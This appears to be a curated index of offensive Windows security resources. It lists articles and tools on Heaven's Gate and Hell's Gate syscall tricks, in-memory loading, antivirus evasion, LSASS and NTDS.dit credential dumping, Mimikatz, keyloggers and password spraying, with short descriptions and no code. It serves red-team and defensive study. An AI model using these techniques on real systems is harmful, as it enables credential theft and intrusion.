  - In this article I am going to describe a way to execute code in the Windows kernel by using windbg local kernel debugging. It’s not a vulnerability; I am going to use only windbg’s legal functionality, and I am going to use only a batch file (not powershell or vbs, an old style batch only) and some Microsoft-signed executables (some of them already in the system, and windbg, which will be dumped from the batch file). With this method it is not necessary to launch executables at user mode (only Microsoft signed executables) or load signed drivers. PatchGuard and other protections don’t stop us. We put our code directly into kernel memory space and we hook some point to get a thread executing it. As we will demonstrate, a malware consisting of a simple batch file would be able to jump to kernel, enabling local kernel debugging and using windbg to get its code executed in kernel.

Heaven's Gate
- 101
  - Ten years later, malware authors are still abusing 'Heaven's Gate' technique - Catalin Cimpanu (2019)
  - Heaven's Gate: 64-bit code in 32-bit file - defjam(2011)
  - Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching - George Nicolaou(2012)
    - This post presents the research conducted under the domain of dynamic processor mode (or context) switching that takes place prior to the invocation of kernel mode functions in 32bit processes running under a 64bit Windows kernel. Processes that are designed and compiled to execute under a 32bit environment get loaded inside the Windows-on-Windows64 (WoW64) subsystem and are assigned threads running in IA-32e compatibility mode (32bit mode). When a kernel request is being made through the standard WoW64 libraries, at some point, the thread switches to 64bit mode, the request is executed, the thread switches back to compatibility mode and execution is passed back to the caller. The switch from 32bit compatibility mode to 64bit mode is made through a specific segment call gate referred to as the Heaven’s Gate, thus the title of this topic. All threads executing under the WoW64 environment can execute a FAR CALL through this segment gate and switch to the 64bit mode. The feature of mode switch can also be viewed from the security and maliciousness point of view. It can be used as an anti reverse engineering technique for protecting software up to the malicious (or not) intents of cross process generic library injection or antivirus and sandbox evasion. The result of this research is a library named W64oWoW64 which stands for Windows64 On Windows On Windows64.
  - Rise of the dual architecture usermode rootkit - MalwareTech(2013)
  - The 0x33 Segment Selector (Heavens Gate) - MalwareTech(2014)
- Articles/Blogposts/Writeups
  - Code obFU(N)scation mixing 32 and 64 bit mode instructions - giula
  - Closing “Heaven’s Gate” - Alex Ionescu(2015)
  - Crowbar: Breaking through Heaven’s Gate - KrabsOnSecurity
  - Heaven's Gate: 64-bit code in 32-bit file - roy_g_biv(2009)
  - The power of WOW64 - int0h(2009)
  - Anti-Anti-Debugging via WOW64 - int0h(2011)
  - DLL Injection and WoW64 - Corsix.org(2010)
  - Mixing x86 with x64 code - ReWolf(2011)
  - Heaven’s gate and a chameleon code (x86/64) - Hexacorn(2015)
  - Jumping into heaven’s gate - Yarden Shafir(2018)
  - Hooking Heaven’s Gate — a WOW64 hooking technique - Hoang Bui(2019)
  - How to Hook 64-Bit Code from WOW64 32-Bit Mode - Ruslan Valiakhmetov(2020)
  - Deep Hooks: Monitoring native execution in WoW64 applications – Part 1 - Yarden Shafir, Assaf Carlsbad(2018)
    - Part 2
    - Part 3
  - A Pony Hidden in Your Secret Garden - David Cohen(2019)
    - Pony is the name of the malware
  - VB2019 paper: Exploring Emotet, an elaborate everyday enigma - Luca Nagy(2019)
    - Based on Sophos detection numbers, the Emotet trojan is the most widespread malware family in the wild. Since its appearance more than five years ago, it has been – and remains – the most notorious and costly active malware. Emotet owes its reputation to its constant state of evolution and change. The malware’s rapid advancement helps support its highly sophisticated operation. This paper will discuss the reverse engineering of its components, as well as the capabilities and features of Emotet: a detailed overview of its multi-layered operation, starting with the spam lure, the malicious attachments (and their evolution), and the malware executable itself, from its highly sophisticated packer to its C2 server communications.
  - WoW64 internals ...re-discovering Heaven's Gate on ARM
  - "Heaven’s Gate": an old but effective technique (original title: "Heaven’s Gate" Một kĩ thuật cũ nhưng hiệu quả) - Tran Trung Kien(2020)
  - How to Hook 64-Bit Code from WOW64 32-Bit Mode - apriorit.com(2020) (originally published on https://www.apriorit.com/)
  - GuLoader: Peering Into a Shellcode-based Downloader - Umesh Wanve(2020)
- Talks/Presentations/Videos
  - DEEP Hooks: Monitoring Native Execution In WOW64 Applications - Assaf Carlsbad, Yarden Shafir(2018)
- Tools
  - Heavens-Gate-2.0
    - "Unable to find any properly implemented/working code that works on Windows 10, I have decided to open the Heaven's Gate on my own. Yes, this one is working on an updated Windows 10 (as of 22nd July 2017). Tested on Windows 7 too"
  - HeavenInjector
    - Simple proof of concept code for injecting libraries on 64bit processes from a 32bit process
  - rewolf-wow64ext
    - Helper library for x86 programs that run under the WOW64 layer on x64 versions of Microsoft Windows operating systems. It enables x86 applications to read, write and enumerate memory of native x64 applications. There is also the possibility to call any x64 function from the 64-bit version of NTDLL through a special function called X64Call(). As a bonus, wow64ext.h contains definitions of some structures that might be useful for programs that want to access PEB, TEB, TIB etc.
  - W64oWoW64
  - wow64pp
    - An easy to use header-only heavens gate implementation based on wow64ext X64Call, however not using inline assembly, allowing it to work on other compilers like MinGW.

Hell's Gate
- 101
  - Hells Gate - smelly__vx(@RtlMateusz), am0nsec(@am0nsec)
    - "However, we are happy to report that we have lifted the veil, we have identified an approach capable of programmatically aggregating syscalls, at run-time, shedding us of unnecessary dependencies. For the sake of brevity, this paper will primarily focus on dynamically retrieving syscalls. This paper assumes you possess knowledge pertaining to both Windows internals and the Windows PE file format."
- Articles/Blogposts/Writeups
  - Implementing Direct Syscalls Using Hell’s Gate - N4kedTurtle(2020)
  - Reading memory of x64 process from x86 process - ReWolf(2012)
  - wow64ext library update - ReWolf(2012)
  - WoW64 internals: Tale of GetSystemFileCacheSize - ReWolf(2013)
  - wow64ext finally compatible with Windows 8 - ReWolf(2013)
  - WoW64 internals: Unexpected behaviour of NtQueryDirectoryObject - ReWolf(2015)
- Tools
  - Hell's Gate
    - Original C Implementation of the Hell's Gate VX Technique
  - HellsGatePoC
  - C# Hell's Gate
    - C# Implementation of the Hell's Gate VX Technique
  - BananaPhone

Heresy's Gate
- Articles/Blogposts/Writeups
- Tools

In-Memory Execution
- Injection
- Loading-after-execution
  - Tools
    - foolavc
      - This project is a continuation of foolav. The original foolav was offered only as an x86 executable and used a single encoding for an externally kept payload file. Once foolav is executed, the payload is loaded into memory and executed as shellcode in a separate thread. foolavc on the other hand supports both x86 and x86_64 architectures, and allows use of both internal (built-in) or external payloads. Those can be interpreted in one of three ways: shellcode, DLL and EXEcutable.
    - MemoryModule
      - MemoryModule is a library that can be used to load a DLL completely from memory - without storing on the disk first.

Native Binaries/Functionality
- Research on CMSTP.exe
  - Methods to bypass UAC and load a DLL over webdav
- rundll32 lockdown testing goodness
- Hack Microsoft Using Microsoft Signed Binaries - Pierre-Alexandre Braeken
- Hack Microsoft Using Microsoft Signed Binaries - BH17 - Pierre-Alexandre Braeken
  - Imagine being attacked by legitimate software tools that cannot be detected by usual defender tools. How bad could it be to be attacked by malicious threat actors only sending bytes to be read and bytes to be written in order to achieve advanced attacks? The most dangerous threat is the one you can’t see. At a time when it is not obvious to detect memory attacks using API like VirtualAlloc, what would be worse than having to detect something like `f0xffffe0010c79ebe8+0x8 L4 0xe8 0xcb 0x04 0x10`? We will be able to demonstrate that we can achieve every kind of attack you can imagine using only PowerShell and a Microsoft Signed Debugger. We can retrieve passwords from userland memory, execute shellcode by dynamically parsing loaded PEs or attack the kernel, achieving advanced persistence inside any system.
- RogueMMC
  - Execute Shellcode And Other Goodies From MMC

Path Obfuscation
- DOS File Path Magic Tricks - Carrie Roberts(2020)
  - In this article I give a variety of examples of how to refer to the notepad.exe executable from the C:\Windows\System32 directory using various path notations. I also discuss how some of these tricks can be used to annoy or fool system administrators and information security analysts.

Polymorphism
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
  - Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) - Trenton Ivey, Neal Bridges(Derbycon 2013)
    - Description: Think of the last time you got sick. Your immune system is an amazing piece of machinery, but every now and then, something gets past it. Antivirus evasion techniques can become more effective when modeled after infectious diseases. This talk highlights many of the antivirus evasion techniques in use today. Going further, this talk shows how genetic algorithms can quickly and repeatedly “evolve” code to evade many malicious code detection techniques in use today.
- Papers
- Tools
  - Enneos
    - Evolutionary Neural Network Encoder of Shenanigans. Obfuscating shellcode with an encoder that uses genetic algorithms to evolve neural networks to contain and output the shellcode on demand.
  - MorphAES
    - MorphAES is the world's first polymorphic shellcode engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS; it's cross-platform as well and library-independent.

Process-Argument Spoofing

Process Un-Linking

Process 'Hardening'
- D/Invokify PPID Spoofy & BlockDLLs - RastaMouse(2020)
- Hiding Process Memory via Anti Forensic Techniques - Ralph Palutke, Frank Block, Patrick Reichenberger, Dominik Stripeika(DFRWS USA2020)
- Bypassing VirtualBox Process Hardening on Windows - James Forshaw(2017)
  - This blog post will describe the implementation of Oracle’s VirtualBox protected process and detail three different, but now fixed, ways of bypassing the protection and injecting arbitrary code into the process. The techniques I’ll present can equally be applied to similar implementations of “protected” processes in other applications.

REPL

Sandbox Detection & Evasion
- Articles/Writeups
- Tools

Signatures

Credential Access
- 101
  - An Overview of KB2871997 - msrc-blog.ms
    - Increasing complexity of retrieving clear-text creds
  - Cached and Stored Credentials Technical Overview - docs.ms(2016)
    - Applies To: Windows Vista, Windows Server 2008, Windows 7, Windows 8.1, Windows Server 2008 R2, Windows Server 2012 R2, Windows Server 2012, Windows 8
  - Cached and Stored Credentials - ldapwiki
  - Windows Credential Management, Logon Sessions and the Double Hop Problem - Acebond(2019)
    - "I wanted to provide a quick overview on Windows credential management in relation to penetration testing, why passwords are not always stored in memory and the Double Hop problem."
- Articles/Blogposts/Writeups
  - Collection/Overview of techniques
    - Dump Windows password hashes efficiently - Part 1(2011)
    - Dumping user passwords in plaintext on Windows 8.1 and Server 2012 - labofapenetrationtester
    - Intercepting Password Changes With Function Hooking - clymb3r(2013)
    - Dumping Windows Credentials
    - Hunting for Credentials Dumping in Windows Environment - Teymur Kheirhabarov - ZeroNights(2017)
    - Dumping Clear-Text Credentials - NetbiosX(2018)
    - Dump-Clear-Text-Password-after-KB2871997-installed - 3gstudent
    - Extracting credentials from a remote Windows system - Living off the Land - bitsadmin.in(2020)
    - Where we can find different kinds of passwords in the operating system? - Paula Januszkiewicz(2020)
    - MITRE ATT&CK T1003 Credential Dumping - Süleyman Özarslan(2020)
      - In this article, we review: the fundamentals of the credential dumping technique; resources targeted by adversaries for credential dumping; its use cases by threat actors and malware; the most used OS resources for credential dumping; 11 red team exercises for this technique
  - DMA
    - The True Story of Windows 10 and the DMA-protection - Sami Laiho
      - This blog post will tell you if / how Windows 10 protects against DMA (Direct Memory Access) based attacks used against BitLocker and other encryption mechanisms by stealing the encryption key from the memory of a running computer. The story might be long(ish) but rest assured you want to read it through.
  - From a Memory Dump
  - Specific Programs
    - SecretsDump Demystified - Mike Benich(2020)
    - Password Managers: Under the Hood of Secrets Management - ISE
      - Password managers allow the storage and retrieval of sensitive information from an encrypted database. Users rely on them to provide better security guarantees against trivial exfiltration than alternative ways of storing passwords, such as an unsecured flat text file. In this paper we propose security guarantees password managers should offer and examine the underlying workings of five popular password managers targeting the Windows 10 platform: 1Password 7, 1Password 4, Dashlane, KeePass, and LastPass. We anticipated that password managers would employ basic security best practices, such as scrubbing secrets from memory when they are not in use and sanitization of memory once a password manager was logged out and placed into a locked state. However, we found that in all password managers we examined, trivial secrets extraction was possible from a locked password manager, including the master password in some cases, exposing up to 60 million users that use the password managers in this study to secrets retrieval from an assumed secure locked state.

3rd Party
- PulseSecure
- Solarwinds Orion
  - SolarFlare Release: Password Dumper for SolarWinds Orion - mubix(2020)
  - solarflare
    - Credential Dumping Tool for SolarWinds Orion

Active Directory Environment
- Articles/Blogposts/Writeups
  - Dumping Domain Password Hashes - pentestlab.blog
  - How Attackers Dump Active Directory Database Credentials - adsecurity.org
  - Compromising Plain Text Passwords In Active Directory
  - Safely Dumping Domain Hashes, with Meterpreter - Rapid7
  - Active Directory Domain Services Database Mounting Tool (Snapshot Viewer or Snapshot Browser) Step-by-Step Guide
    - This guide shows how you can use an improved version of Ntdsutil and a new Active Directory® database mounting tool in Windows Server® 2008 to create and view snapshots of data that is stored in Active Directory Domain Services (AD DS) or Active Directory Lightweight Directory Services (AD LDS), without restarting the domain controller or AD LDS server. A snapshot is a shadow copy—created by the Volume Shadow Copy Service (VSS)—of the volumes that contain the Active Directory database and log files.

AWS
- Articles/Blogposts/Writeups

AutoLogon
- Tools
  - DecryptAutoLogon
    - Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon

Azure
- Articles/Blogposts/Writeups
  - PowerShell, Azure, and Password Hashes in 4 steps - FortyNorth Security
    - This blog post will walk you through the process of obtaining hashes from a domain controller within Azure using PowerShell.

Clipboard

CredSSP

DPAPI
- TBAL: an (accidental?) DPAPI Backdoor for local users a.k.a how a convenience feature undermined a security feature - vztekoverflow(2018)
  - In this article, we have demonstrated that in some scenarios, the default Windows configuration leads to the SHA‑1 hash of the user’s password being stored to the disk in a way that is retrievable without any further knowledge about the password. We argue that this is an issue for DPAPI, because if the secret necessary for decrypting the master key was to be stored on the disk by design, Microsoft could have kept on using the NTLM hash it uses in domain settings (and supposedly used in the first implementation of DPAPI). We then demonstrated how this attack can be executed using readily available tools.

Dumping Credential Manager
- Invoke-WCMDump
  - PowerShell Script to Dump Windows Credentials from the Credential Manager

Dumping NTDS.dit
- Articles/Blogposts/Writeups
  - How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
  - Extracting Password Hashes From The Ntds.dit File
  - Obtaining NTDS.Dit Using In-Built Windows Commands - Cyberis(2014)
  - Volume Shadow Copy NTDS.dit Domain Hashes Remotely - Part 1 - mubix
  - Getting Hashes from NTDS.dit File - swordshield.com
  - Extracting Hashes and Domain Info From ntds.dit - ropnop
  - Practice ntds.dit File Part 2: Extracting Hashes - Didier Stevens
- Tools
  - adXtract
  - DIT Snapshot Viewer
    - DIT Snapshot Viewer is an inspection tool for the Active Directory database, ntds.dit. This tool connects to ESE (Extensible Storage Engine) and reads tables/records including hidden objects via the low-level C API. The tool can extract the ntds.dit file without stopping lsass.exe. When the Active Directory service is running, lsass.exe locks the file and does not allow access to it. The snapshot wizard copies ntds.dit using VSS (Volume Shadow Copy Service) even if the file is exclusively locked. As copying ntds.dit may cause data inconsistency in the ESE DB, the wizard automatically runs the esentutil /repair command to fix the inconsistency.
  - NTDSXtract - Active Directory Forensics Framework
    - This framework was developed by the author in order to provide the community with a solution to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).
  - NTDSDumpEx
    - NTDS.dit offline dumper with non-elevated
  - NTDS-Extraction-Tools
    - Automated scripts that use an older version of libesedb (2014-04-06) to extract large NTDS.dit files
  - gosecretsdump
    - This is a conversion of the impacket secretsdump module into golang. It's not very good, but it is quite fast. Please let me know if you find bugs, I'll try and fix where I can - bonus points if you can provide sample .dit files for me to bash against.

Dumping Process Memory
- 101
  - MiniDumpWriteDump function - docs.ms
    - Writes user-mode minidump information to the specified file.
  - MiniDumpWriteDump function (minidumpapiset.h) - docs.ms
  - minidump.c File Reference - ReactOS
  - Why is SeDebugPrivilege enabled in PowerShell? - Lee Holmes(2017)
    - This is enabled by .NET when PowerShell uses the System.Diagnostics.Process class in .NET, which it does for many reasons. One example is the Get-Process cmdlet. Another example is the method it invokes to get the current process PID for the $pid variable. Any .NET application that uses the System.Diagnostics.Process class also enables this privilege.
- Articles/Blogposts/Writeups
  - MiniDumpWriteDump via COM+ Services DLL - modexp(2019)
  - Dumping Process Memory with Custom C# Code - 3xpl01tc0d3r(2019)
  - SassyKitdi: Kernel Mode TCP Sockets + LSASS Dump - @zerosum0x0(2020)
    - This post describes a kernel mode payload for Windows NT called "SassyKitdi" (LSASS + Rootkit + TDI). This payload is of a nature that can be deployed via remote kernel exploits such as EternalBlue, BlueKeep, and SMBGhost, as well as from local kernel exploits, i.e. bad drivers.
  - How to Capture a Minidump: Let Me Count the Ways - John Robbins(2020)
- Tools
  - KsDumper
    - Dumping processes using the power of kernel space!
  - PyKDumper
    - PyKDumper is a mimikatz-inspired PyKD-based script that retrieves and decrypts usernames, logon servers and credentials from the lsass process.
  - SassyKitdi
    - Kernel Mode TCP Sockets + LSASS Dump (Rust Shellcode)

Internal Monologue
101
- Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
  - In secure environments, where Mimikatz should not be executed, an adversary can perform an Internal Monologue Attack, in which they invoke a local procedure call to the NTLM authentication package (MSV1_0) from a user-mode application through SSPI to calculate a NetNTLM response in the context of the logged on user, after performing an extended NetNTLM downgrade.
Articles/Blogposts/Writeups
Tools
- selfhash
  - Selfhash allows you to get password hashes of the current user. This tool doesn't require high privileges, i.e. SYSTEM, but on the other hand it returns an NTLM challenge/response rather than the raw hash, so you would crack it later.
Keylogger
Articles/Blogposts/Writeups
Papers
- You Can Type, but You Can’t Hide: A Stealthy GPU-based Keylogger
  - Keyloggers are a prominent class of malware that harvests sensitive data by recording any typed in information. Keylogger implementations strive to hide their presence using rootkit-like techniques to evade detection by antivirus and other system protections. In this paper, we present a new approach for implementing a stealthy keylogger: we explore the possibility of leveraging the graphics card as an alternative environment for hosting the operation of a keylogger. The key idea behind our approach is to monitor the system’s keyboard buffer directly from the GPU via DMA, without any hooks or modifications in the kernel’s code and data structures besides the page table. The evaluation of our prototype implementation shows that a GPU-based keylogger can effectively record all user keystrokes, store them in the memory space of the GPU, and even analyze the recorded data in-place, with negligible runtime overhead.
Tools
- Puffadder
  - Puffadder is an open-source, hidden and undetectable keylogger for Windows written in Python 2.7 which can also capture screenshots, mouse window clicks and clipboard data.
Local Account
- Win Brute Logon (Proof Of Concept)
  - Crack any Microsoft Windows user's password without any privilege (Guest account included)
Local Phishing
Articles/Blogposts/Writeups
Tools
- Pickl3
  - Pickl3 is a Windows active-user credential phishing tool: execute Pickl3 and it phishes the target user's credentials.
Logon
- Capturing Windows 7 Credentials at Logon Using Custom Credential Provider
  - The quick lowdown: I wrote a DLL capable of logging the credentials entered at logon for Windows Vista, 7 and future versions which you can download at http://www.leetsys.com/programs/credentialprovider/cp.zip. The credentials are logged to a file located at c:\cplog.txt. Simply copy the dll to the system32 directory and run the included register.reg script to create the necessary registry settings.
Local Files
Articles/Blogposts/Writeups
Tools
- windows_sshagent_extract
  - PoC code to extract private keys from Windows 10's built-in ssh-agent service
Local Security Authority Subsystem Service (LSA & LSASS)
101
Articles/Blogposts/Writeups
- Windows LSA secrets - passcape.com
- Dumping LSA Secrets - @spotheplanet(2019)
- Dumping Lsass.exe to Disk Without Mimikatz and Extracting Credentials - @spotheplanet
- Some ways to dump LSASS.exe - Mark Mo
- Extract credentials from lsass remotely - hackndo
- Bypassing SACL Auditing on LSASS - James Forshaw(2017)
- Hidden Gems in Windows: The Hunt is On - Nate Caroe(2019)
- Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10 - RedCursor.com.au(2020)
- Dumping LSASS without Mimikatz with MiniDumpWriteDump == Reduced Chances of Getting Flagged by AVs - @spotheplanet
- Protecting the LSASS.EXE process with RunAsPPL - adamcouch.co.uk
- Credential Dumping: Local Security Authority (LSA|LSASS.EXE) - Yashika Dhir(2020)
Tools
- Dumpert
  - Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct system calls and API unhooking and combines these techniques in proof-of-concept code which can be used to create an LSASS memory dump using Cobalt Strike, while not touching disk and evading AV/EDR-monitored user-mode API calls.
- AndrewSpecial
  - AndrewSpecial, dumping lsass' memory stealthily and bypassing "Cilence" since 2019.
- PhysMem2Profit
  - Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely. The intention of this research is to propose an alternative approach to credential theft and create a modular framework that can be extended to support other drivers that can access physical memory. Physmem2profit generates a minidump (.dmp) of LSASS that can be further analyzed with Mimikatz. The tool does not require Cobalt Strike but should work fine over beacon with a SOCKS proxy.
  - Blogpost
  - Talk
- lsassy
  - Python library to remotely extract credentials on a set of hosts
  - Blogpost
- SharpMiniDump
  - Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses dynamic API calls, direct syscalls and Native API unhooking to evade AV/EDR detection.
- PPLKiller
  - Tool to bypass LSA Protection (aka Protected Process Light). I’ve noticed there is a common misconception that LSA Protection prevents attacks that leverage SeDebug or Administrative privileges to extract credential material from memory, like Mimikatz. LSA Protection does NOT protect from these attacks; at best it makes them slightly more difficult, as an extra step needs to be performed.
  - Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10 - Acebond(2020)
- Spraykatz
  - Spraykatz is a tool without any pretension, able to retrieve credentials on Windows machines and large Active Directory environments. It simply tries to procdump machines and parse the dumps remotely in order to avoid detection by antivirus software as much as possible.
- SharpKatz
  - Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
- SharpSecDump
  - .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user.
Mimikatz/Similar
- Official
Using
- Unofficial Guide to Mimikatz
- Mimikatz Overview, Defenses and Detection
- Mimikatz Logs and Netcat
- Dumping a Domains worth of passwords using mimikatz
- Mass mimikatz - hacklikeapornstar
- Reading DPAPI Encrypted Secrets with Mimikatz and C++ - ired.team
- How to add a Module in Mimikatz?
- howto ~ scheduled tasks credentials - Benjamin Delpy(2017)
  - There are some ways to get scheduled tasks passwords
- howto ~ credential manager saved credentials - Benjamin Delpy(2017)
- mimikatz offline addendum - francesco picasso
How-it-Works
- mimikatz: deep dive on lsadump::lsa /patch and /inject - Dimitrios Slamaris
- Walk-through Mimikatz sekurlsa module
  - So in this post, I propose you to follow the steps I used in an attempt to understand the sekurlsa::tspkg command and reproduce its operations with WinDbg on a LSASS dump from a Windows 7 SP1 64-bits machine. We will find the secrets in the dump, and then decrypt them.
- Exploring Mimikatz - Part 1 - WDigest - Adam Chester
- Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD - Matteo Malvica(2020)
Defense
Other
- Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
- Windows Credential Guard & Mimikatz - nviso
- Auto-Dumping Domain Credentials using SPNs, PowerShell Remoting, and Mimikatz - Scott Sutherland
- Mimikatz 2.0 - Brute-Forcing Service Account Passwords
  - If everything about that ticket-generation operation is valid except for the NTLM hash, then accessing the web application will result in a failure. However, this will not cause a failed logon to appear in the Windows® event log. It will also not increment the count of failed logon attempts for the service account. Therefore, the result is an ability to perform brute-force (or, more realistically, dictionary-based) password checks for such a service account, without locking it out or generating suspicious event log entries.
- Golden Tickets
- Skeleton Key
- DCSync
  - Mimikatz and DCSync and ExtraSids, Oh My - harmj0y
  - Active Directory Attack - DCSync - c0d3xpl0it
- Play with katz, get scratched - Skelsec(2020)
- BetterSafetyKatz
  - Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi's GitHub repo, runtime-patches signatures and uses SharpSploit DInvoke to PE-load it into memory.
pypykatz
- pypykatz
  - Mimikatz implementation in pure Python
- pypykatz_server
- pypykatz_dn
MsvpPasswordValidate Hooking
- MsvpPasswordValidate hooking - Federico Lagasta
  - Dumping local credentials by hooking MsvpPasswordValidate in NtlmShared.dll
- HppDLL
  - Source code for HppDLL - local password dumping using MsvpPasswordValidate hooks.
- MyHashDump
  - Project to inject into lsass and use a function hook on MsvpPasswordValidate to collect hashes.
NPLogonNotify()
- NPLogonNotify function (npapi.h) - docs.ms
  - MPR calls this function to notify the credential manager that a logon event has occurred, allowing the credential manager to return a logon script. The NPLogonNotify function is implemented by a credential manager DLL (see Remarks).
- Getting Windows Passwords in ClearText - Aaladha(2020)
- NPPSpy
  - Simple (but fully working) code for NPLogonNotify(). The function obtains logon data, including the cleartext password.
NTLM-related
- The NTLM Authentication Protocol and Security Support Provider - davenport.sourceforge
- Live off the Land and Crack the NTLMSSP Protocol
  - Last month Bleeping Computer published an article about PKTMON.EXE, a little known utility in Windows 10 that provides the ability to sniff and monitor network traffic. I quickly wondered if it would be feasible to use this utility, and other native tools within Windows, to capture NTLMv2 network authentication handshakes. TL;DR: Yes it is possible and I wrote a Python3 script called NTLMRawUnHide that can extract NTLMv2 password hashes from packet dumps of many formats!
- NTLMRawUnhide.py
  - NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The tool was developed to extract NTLMv2 hashes from files generated by native Windows binaries like NETSH.EXE and PKTMON.EXE without conversion.
Password Filter DLL
- PasswordStealing - PSBits
  - "Password stealing DLL I wrote around 1999, some time before Active Directory was announced. And of course it still works. First, it was written in 32-bit Delphi (pardon my language) and when it stopped working as everything changed into 64-bit - in (so much simpler when it comes to Win32 API) C, as I did not have 64-bit Delphi. The original implementation was a bit more complex, including broadcasting the changed password over the network etc. but now it works as a demonstration of an idea, so let's keep it as simple as possible. It works everywhere - on local machines for local accounts and on DCs for domain accounts."
- Credential Access – Password Filter DLL - NetbiosX
Password Spraying
Linux
- Raining shells on Linux environments with Hwacha
- Hwacha
  - Hwacha is a tool to quickly execute payloads on *nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.
Windows
- Use PowerShell to Get Account Lockout and Password Policy
- DomainPasswordSpray
  - DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain, excluding accounts that are expired, disabled, locked out, or within 1 attempt of lockout.
- NTLM - Open-source script from root9B for manipulating NTLM authentication
  - This script tests a single hash or file of hashes against an ntlmv2 challenge/response, e.g. from auxiliary/server/capture/smb. The idea is that you can identify re-used passwords between accounts that you do have the hash for and accounts that you do not have the hash for, offline and without cracking the password hashes. This saves you from trying your hashes against other accounts live, which triggers lockouts and alerts.
- CredNinja
  - A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at scale via SMB, plus now with a user hunter.
- passpr3y
  - This is a fire-and-forget long-running password spraying tool. You hand it a list of usernames and passwords and walk away. It will perform a horizontal login attack while keeping in mind lockout times, erroneous responses, etc. Set it up on your attack box at the beginning of an assessment and check back for creds gradually over time. Output is intended to be easy to read through and grep. Focus is on simplicity.
- Spray
  - A Password Spraying tool for Active Directory Credentials by Jacob Wilkin(Greenwolf)
- SharpHose
  - SharpHose is a C# password spraying tool designed to be fast, safe, and usable over Cobalt Strike's execute-assembly. It provides a flexible way to interact with Active Directory using domain-joined and non-joined contexts, while also being able to target specific domains and domain controllers. SharpHose takes into consideration the domain password policy, including fine grained password policies, in an attempt to avoid account lockouts. Fine grained password policies are enumerated for the users and groups that the policy applies to. If the policy also applies to groups, the group users are captured. All enabled domain users are then classified according to their password policies, in order of precedence, and marked as safe or unsafe. The remaining users are filtered against an optional user-supplied exclude list. Besides just spraying, red team operators can view all of the password policies for a domain, all the users affected by the policy, or just view the enabled domain users. Output can be sent directly to the console or to a user-supplied output folder.
RDP
Service Accounts
Tools
- serviceFu
  - Automates credential skimming from service accounts in the Windows Registry
Volume Shadow Copy Service
WDigest
Web Browsers
- SharpCookieMonster
  - Extracts cookies from Chrome.
  - Blogpost
Wifi(saved)
Tools
- credgrap_ie_edge
  - Extract stored credentials from Internet Explorer and Edge
- quarkspwdump
  - Dump various types of Windows credentials without injecting in any process.
- SessionGopher
  - SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
- CredCrack
  - CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded! CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.
- pysecdump
  - pysecdump is a python tool to extract various credentials and secrets from running Windows systems. It currently extracts: LM and NT hashes (SYSKEY protected); cached domain passwords; LSA secrets; secrets from Credential Manager (only some)
- Remote-Desktop-Caching-
  - This tool allows one to recover old RDP (mstsc) session information in the form of broken PNG files. These PNG files allow a Red Team member to extract juicy information such as LAPS passwords or any sensitive information on the screen. A Blue Team member can reconstruct the PNG files to see what an attacker did on a compromised host. It is extremely useful for a forensics team to extract timestamps after an attack on a host to collect evidence and perform further analysis.
Discovery
101
Talks/Presentations/Videos
- Post Exploitation: Striking Gold with Covert Recon - Derek Rook(WWHF19)
  - You're on a covert penetration test focusing on the client's monitoring and alerting capabilities. You've just established a foothold, maybe even elevated to admin, but now what? You want to know more about the internal network but careless packet slinging will get you caught. Join me on a mining expedition where you can't swing your pick axe without striking gold. We'll be mining logs, pilfering connection statistics, and claim jumping process network connections. Without leaving the comfort of your beachhead, you'll be shouting "Eureka!" in no time.
AD
AppLocker
Articles/Blogposts/Writeups
Tools
Browser Cookies
- cookie_crimes
  - Read local Chrome cookies without root or decrypting
COM
Endpoint Protections
Articles/Blogposts/Writeups
Event Log
Files
Articles/Blogposts/Writeups
- Build a Query to Search the Windows Index from PowerShell - Dr Scripto(2012)
  - Guest blogger, James O’Neill, discusses using Windows PowerShell to build a query to search the Windows Index.
- Hey, Scripting Guy! Weekend Scripter: Using the Windows Search Index to Find Specific Files - Dr Scripto(2010)
- Reading Windows Sticky Notes - two06(2020)
- Red Team Enumeration: A corner rarely explored - Mohammed Danish(2020)
- StickyReader
  - Read Sticky Notes from Windows 10
- Unmanaged file searching with Filesearcher.exe - Jean-François Maes(2020)
Tools
- Snaffler
  - Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).
- diskover
  - File system crawler, disk space usage, file search engine and file system analytics powered by Elasticsearch
- FileSearcher
  - Unmanaged assembly file searcher for when a fully interactive beacon session is not opsec-safe enough.
Logs
Articles/Blogposts/Writeups
Mail
Articles/Blogposts/Writeups
Tools
NetworkCapture
Articles/Blogposts/Writeups
Tools
Sitrep
